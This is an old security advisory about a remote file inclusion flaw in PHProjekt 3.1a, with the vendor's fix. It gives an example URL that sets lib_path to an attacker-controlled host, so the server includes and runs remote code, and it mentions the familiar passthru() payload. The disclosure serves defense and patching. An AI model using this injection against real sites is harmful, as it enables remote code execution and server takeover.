COMMAND
PHProjekt arbitrary command execution
SYSTEMS AFFECTED
3.1a and previous
PROBLEM
b0iler found following :
This script is a content management system for websites, much like
slashcode or phpnuke.
There problem is in the module filemanager, where you can directly
access the module and then define values which would have been defined
with the script\'s global configuration file had the module not be
accessed directly. The first line in filemanager/filemanager_forms.php
is:
include_once(\"$lib_path/access_form.inc.php\");
so an attacker could go to
http://site.com/filemanager/filemanager_forms.php?lib_path=http://attacker.com/nasty/scripts
and the script at http://hacker.com/nasty/scripts/access_form.inc.php
would get include()\'d. I am sure you have seen the remotely included
scripts with the passthru() example many times.
If php is compiled with all_url_fopen off then an attacker would have a
harder time exploitting this. I can only see guessing the path to an
uploaded script as the only other way of exploiting this (if
magic_quotes is on - else null byte can do some damage). I believe it
is secure since if they upload a script with the name lib_path the path
(ex. /tmp/random/access_form.inc.php) will be stored in $lib_path. this
would make the include_once try to include
/tmp/random/access_form.inc.php/access_form.inc.php which would not
work. PHP will delete this /tmp/randomcharacters/access_form.php when
it ends, so it cannot be sent as lib_path once the error msg (if
display_errors is on) tells the attacker the path to the script. I
heard concerns about this from someone running php who wantted a secure
install and configuration.
It would be best if all the modules included the global configuration
file as their first line and double check to make sure no variables are
left to other scripts passing them. Or some sort of modules.php script
like phpnuke has wouldn\'t be a bad idea ether and it locks security by
making sure the script isn\'t called directly.
SOLUTION
he author took this advice and added this as the first line in the
module:
if (!defined(\"lib_included\")) { die(\"Please use index.php!\"); }
Since I believe constants cannot be defined with GPC.
The author was contacted a few days ago and was very quick to respond.
They also took the security problem seriously, got out a patch asap,
and notified their mailing list. The author says the script will be in
for a rewrite to help improve overall security and structure. New
version will be out shortly.